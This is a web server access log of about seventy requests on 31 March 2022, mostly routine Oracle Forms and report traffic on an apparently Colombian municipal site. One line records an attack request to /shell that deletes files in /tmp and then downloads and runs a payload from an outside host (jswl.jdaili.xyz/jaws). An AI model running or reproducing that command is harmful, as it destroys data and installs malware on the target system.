200.118.64.109 - - [31/Mar/2022:10:46:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 4130
200.118.64.109 - - [31/Mar/2022:10:46:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:46:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:46:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:46:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:46:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:46:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:46:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
200.118.64.109 - - [31/Mar/2022:10:46:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 106
200.118.64.109 - - [31/Mar/2022:10:46:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:46:57 -0500] "GET /reports/rwservlet/getjobid73953?server=repnomi HTTP/1.1" 200 47681
200.118.64.109 - - [31/Mar/2022:10:47:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:47:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:47:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:47:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:47:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:47:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 15
173.252.107.1 - - [31/Mar/2022:10:47:08 -0500] "GET /animales-recuperados-en-san-cristobal-y-ciudad-bolivar-son-atendidos-en-el-centro-de-flora-de-la-secretaria-de-ambiente.html HTTP/1.1" 206 1056
200.118.64.109 - - [31/Mar/2022:10:47:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 110
200.118.64.109 - - [31/Mar/2022:10:47:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:47:10 -0500] "GET /reports/rwservlet/getjobid73954?server=repnomi HTTP/1.1" 200 47681
186.30.65.8 - - [31/Mar/2022:10:47:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 430241
66.249.75.111 - - [31/Mar/2022:10:47:27 -0500] "-" 408 -
186.30.65.8 - - [31/Mar/2022:10:47:43 -0500] "GET /BLA/resoluciones/AUTOS%202018/3955.pdf HTTP/1.1" 200 238513
200.118.64.109 - - [31/Mar/2022:10:47:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:47:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:47:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:47:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 107
200.118.64.109 - - [31/Mar/2022:10:47:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:47:54 -0500] "GET /reports/rwservlet/getjobid73955?server=repnomi HTTP/1.1" 200 47701
200.118.64.109 - - [31/Mar/2022:10:48:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:48:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:48:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:48:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 107
200.118.64.109 - - [31/Mar/2022:10:48:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:48:51 -0500] "GET /reports/rwservlet/getjobid73956?server=repnomi HTTP/1.1" 200 683335
172.22.2.4 - - [31/Mar/2022:10:47:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.188.98 - - [31/Mar/2022:10:49:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
200.118.64.109 - - [31/Mar/2022:10:49:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [31/Mar/2022:10:48:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
216.245.221.92 - - [31/Mar/2022:10:49:55 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [31/Mar/2022:10:49:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:49:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2334
200.118.64.109 - - [31/Mar/2022:10:50:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 10
200.118.64.109 - - [31/Mar/2022:10:50:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 24
200.118.64.109 - - [31/Mar/2022:10:50:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:50:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 3533
200.118.64.109 - - [31/Mar/2022:10:50:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:50:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:50:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:50:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:50:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 106
200.118.64.109 - - [31/Mar/2022:10:50:30 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:50:30 -0500] "GET /reports/rwservlet/getjobid73957?server=repnomi HTTP/1.1" 200 696857
186.102.85.184 - - [31/Mar/2022:10:51:03 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
156.221.165.47 - - [31/Mar/2022:10:51:04 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
186.102.85.184 - - [31/Mar/2022:10:51:03 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.85.184 - - [31/Mar/2022:10:51:10 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.85.184 - - [31/Mar/2022:10:51:10 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.85.184 - - [31/Mar/2022:10:51:15 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.85.184 - - [31/Mar/2022:10:51:15 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.85.184 - - [31/Mar/2022:10:51:24 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.85.184 - - [31/Mar/2022:10:51:24 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.85.184 - - [31/Mar/2022:10:51:38 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19wqXULb7omxLiWDoEPhYNh3H6037+FHJstJxbhiLGbEZOwIESFtDQlCb6/2Ooqjq3eCnzuQ+I07GWn18KoKn/IOVCzQaKCXmkKMb75rOLaorOd6cyUOwfrWKBuyRCMtJzUuknbdGSyMS8u4DaPGhm+S2sIiPP/3qgMK5w2XcBQZQ0VsQPb6VHzhH2INYrL9Z4PqQtAShDY9dsfwhxZpcLCYH1mqSZQqpArSPt889o+PmLWr209Z2a4nNSEab/NkOf87/PcM8Pf9Q==&u=U2FsdGVkX18C10kTGSdK1JMg5laOzXtGOgQUXgYPTtk=&y=U2FsdGVkX1/67PONCuASta4QlfyvAqXE8n+ALqwPcMs= HTTP/1.1" 200 70
201.245.192.253 - - [31/Mar/2022:10:51:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113721
200.118.64.109 - - [31/Mar/2022:10:52:16 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:52:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
200.118.64.109 - - [31/Mar/2022:10:52:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:52:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:52:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
200.118.64.109 - - [31/Mar/2022:10:52:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6163f8022814d4407be70d6c5f0466ff5.e3iSbxaKaheRe34Sc38RahyRchr0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 14
